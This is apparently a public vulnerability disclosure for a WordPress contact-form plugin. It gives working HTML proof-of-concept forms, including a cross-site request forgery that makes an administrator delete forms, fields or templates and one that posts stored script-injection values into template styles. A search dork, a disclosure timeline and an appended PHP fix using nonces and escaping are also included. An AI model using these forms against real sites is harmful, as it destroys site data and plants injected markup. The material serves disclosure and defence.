      <input type="hidden" name="styles[562]" value="1" />
      <input type="hidden" name="styles[597]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[598]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[564]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[565]" value="normal" />
      <input type="hidden" name="styles[566]" value="normal" />
      <input type="hidden" name="styles[594]" value="none" />
      <input type="hidden" name="styles[567]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[568]" value="solid" />
      <input type="hidden" name="styles[569]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[570]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[571]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[572]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[573]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[574]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[595]" value="none" />
      <input type="hidden" name="styles[575]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[576]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[577]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[578]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[579]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[580]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[581]" value="normal" />
      <input type="hidden" name="styles[582]" value="normal" />
      <input type="hidden" name="styles[593]" value="none" />
      <input type="hidden" name="styles[583]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[584]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[585]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[586]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[599]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="styles[628]" value="&quot;&gt;&lt;img src=x&gt;" />
      <input type="hidden" name="task" value="save" />

      <input type="hidden" name="id" value="2" />	<!-- template id to edit -->

      <input type="submit" value="Click me for update template" />
    </form>
  </body>
</html>
<!--
  2015-09-02: vulnerability found
  2015-09-04: Reported to vendor
  2015-09-04: Full disclosure  
-->

<html>
  <!--
	# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
	# Date: 2015-09-04
	# Google Dork: Index of /wp-content/plugins/contact-form-generator/
	# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
	# Vendor Homepage: http://creative-solutions.net/
	# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
	# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
	# Version: 2.0.1
	# Tested on: windows 10 + firefox. 

	==============
	  Description
	==============
	Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
	
	===================
	 TECHNICAL DETAILS
	===================
	A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
	The issue can be exploited by sending a special link to a WordPress administrator who has the vulnerable plugin installed,
	causing the victim administrator to delete a form (PoC #1), delete a form element (PoC #2), or delete an existing template (PoC #3).
  -->
  <!-- 
 	===============================
  	 delete a form  [CSRF PoC #1]
	===============================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms" method="POST">
      <input type="hidden" name="filter_state" value="2" />
      <input type="hidden" name="filter_search" value="" />
       <!-- form id value.. -->
      <input type="hidden" name="ids[]" value="2" />      
      <!-- end -->
      <input type="hidden" name="task" value="delete" />
      <input type="submit" value="Delete form(s)" />
    </form>
  </body>
  <!-- 
 	===============================
  	 delete a field  [CSRF PoC #2]
	===============================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_fields" method="POST">
      <input type="hidden" name="filter_form" value="3" />
      <input type="hidden" name="filter_state" value="2" />
      <input type="hidden" name="filter_type" value="0" />
      <input type="hidden" name="filter_search" value="" />

      <!-- fields ids to delete -->	
      <input type="hidden" name="ids[]" value="9" />
      <input type="hidden" name="ids[]" value="10" />
      <!-- end list -->
	
      <input type="hidden" name="task" value="delete" />
      <input type="hidden" name="ids[]" value="" />
      <input type="submit" value="delete field(s)" />
    </form>
  </body>
  <!-- 
 	==================================
  	 delete a template  [CSRF PoC #3]
	==================================
  -->
  <body>
    <form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_templates" method="POST">
      <input type="hidden" name="filter_state" value="2" />
      <input type="hidden" name="filter_search" value="" />
      <!-- an existing template id(s) to delete -->
      <input type="hidden" name="ids[]" value="1" />    
      <!--end-->
      <input type="hidden" name="task" value="delete" />
      <input type="hidden" name="ids[]" value="" />
      <input type="submit" value="Delete template(s)" />
    </form>
  </body>
</html>
<!--
	===========
	 TIME-LINE
	===========
	2015-09-02: vulnerability found
	2015-09-04: Reported to vendor
	2015-09-04: Full disclosure
-->
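
The template-update form and the three delete forms above are plain cross-site POSTs that carry a `task` field and nothing only the administrator's own session could supply. As an added example (not the plugin's code; it assumes it runs inside a WordPress plugin file, and the `cfg_example_*` names, the option-based storage and the `manage_options` capability are assumptions), this is the nonce and capability check that makes such forged requests fail, with output escaping for the stored `styles[]` values:

```php
<?php
// Added example, not the plugin's code. The cfg_example_* names, the option
// storage and the manage_options capability are assumptions for illustration.

// Render side: every state-changing admin form carries a per-user nonce.
function cfg_example_render_form( $template_id, array $styles ) {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=cfg_example' ) ) . '">';
    wp_nonce_field( 'cfg_example_task', 'cfg_example_nonce' );
    foreach ( $styles as $key => $value ) {
        // esc_attr() keeps a stored value such as "><img src=x> inside the attribute.
        printf( '<input type="text" name="styles[%d]" value="%s" />', absint( $key ), esc_attr( $value ) );
    }
    printf( '<input type="hidden" name="id" value="%d" />', absint( $template_id ) );
    echo '<input type="hidden" name="task" value="save" />';
    submit_button( 'Save template' );
    echo '</form>';
}

// Handler side: check capability and nonce before acting on task=save/delete.
function cfg_example_handle_task() {
    $page = isset( $_GET['page'] ) ? sanitize_key( wp_unslash( $_GET['page'] ) ) : '';
    if ( 'cfg_example' !== $page || empty( $_POST['task'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // A forged cross-site POST cannot know the nonce, so this call ends the
    // request with a 403 before anything is written or deleted.
    check_admin_referer( 'cfg_example_task', 'cfg_example_nonce' );

    $task = sanitize_key( wp_unslash( $_POST['task'] ) );
    $raw  = isset( $_POST['ids'] ) ? (array) wp_unslash( $_POST['ids'] ) : array();
    $ids  = array_filter( array_map( 'absint', $raw ) ); // drops the empty ids[] entry
    if ( 'delete' === $task ) {
        foreach ( $ids as $id ) {
            delete_option( 'cfg_example_template_' . $id );
        }
    } elseif ( 'save' === $task && isset( $_POST['id'], $_POST['styles'] ) ) {
        $clean = array();
        foreach ( (array) wp_unslash( $_POST['styles'] ) as $key => $value ) {
            // sanitize_text_field() strips tags; output is still escaped above.
            $clean[ absint( $key ) ] = sanitize_text_field( $value );
        }
        update_option( 'cfg_example_template_' . absint( $_POST['id'] ), $clean );
    }
}
add_action( 'admin_init', 'cfg_example_handle_task' );
```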